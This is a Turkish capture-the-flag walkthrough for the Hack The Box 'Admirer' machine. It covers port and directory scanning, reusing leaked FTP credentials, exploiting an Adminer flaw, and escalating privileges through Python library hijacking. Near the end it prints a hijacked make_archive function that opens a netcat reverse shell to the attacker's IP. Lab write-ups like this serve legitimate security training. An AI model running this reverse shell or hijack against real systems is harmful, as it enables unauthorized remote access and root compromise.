Mühendisbilir'i Instagramdan takip ediyor musunuz?

Hack The Box -Admirer MAKİNE ÇÖZÜMÜ

Merhaba, hadi çözüme geçelim.

Önce

nmap -Pn -A -T4 -p- 10.10.10.187

Nmap nedir ?

 Nmap, güvenlik açığı taraması ve ağ keşfi için ücretsiz, açık kaynaklı bir araçtır. Ağ yöneticileri Nmap’i sistemlerinde hangi cihazların çalıştığını belirlemek, mevcut ana makineleri ve sundukları hizmetleri keşfetmek, açık bağlantı noktaları bulmak ve güvenlik risklerini tespit etmek için kullanırlar.

Adminer nedir ?

Adminer PHP ile yazılmış tam özellikli bir veritabanı yönetim aracıdır.

PhpMyAdmin, Adminer tersine hedef sunucuya dağıtmak için hazır, tek bir dosya oluşur. Adminer MySQL, PostgreSQL, SQLite, MS SQL ve Oracle için kullanılabilir.

 

nmap taramamdan sonra bir dizin taraması yaptım ve robots.txt yi ziyaret etmem gerektiğini burada da gördüm:

Gobuster nedir ?

Gobuster aslında kaba kuvvet uygulamak için kullanılan bir araçtır:

  • Web sitelerindeki Url ler i listeler (dizinler ve dosyalar).
  • DNS alt alanlarını listeler .

 

Bu çıkan sayfaları kontrol ettiğimizde

Güzel credits elde ettik.Şimdi önce credential kısmında ftp bağlantıları gördüğüm için ftp ile bağlanmayı deniyorum , isterseniz terminalden yapın, isterseniz rahat arayüzü olan filezilla kullanın

FileZilla nedir ?

FileZilla, özetle özgür, açık kaynak ve çoklu platform destekli bir FTP istemcisidir.

Filezilla ile ftp bağlantımı sağladım.

Html.tar.gz içinde bulduklarımı inceliyorum

Adminer.php yi ziyaret ettiğimde ise mysql girişi geliyor, şimdi yukarıda buldugum bilgileri girip bağlantı sağlıyorum.

Bu kodu buldugum yer https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Hala gerçek şifreyi bulamadık (ssh bağlantısı için) , onu arıyoruz.Ve bunu çalıştırdıgımızda çalıştır ve sonra dışa aktar dediğimizde

Gerçek pass değerine ulaştık ve artık ssh ile bağlanabiliriz

Şimdi yetki yükseltmeye çalışalım :

sudo -l

özetle sudo haklarımızı listelemeye yarar.

Şimdi normalde burada herhangi bir işlem için rakamı girdiğimizde hata veriyordu, session hatası root olmadıgımız için, yetki yükselterek bunu aşacagız

 

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

Bu dökümandan faydalanarak şu betiği tmp dizinine ekliyorum ,

Nano ile ekleyebilirsiniz :

import os

def make_archive(a, b, c):

    os.system(‘nc 10.10.15.140  4444 -e “/bin/sh”‘)

( ip kısmına kendi ip nizi yazınız )

(fakat 4444 dinlemede olsun )

En son 6 yazın ve nc ile bağlanın :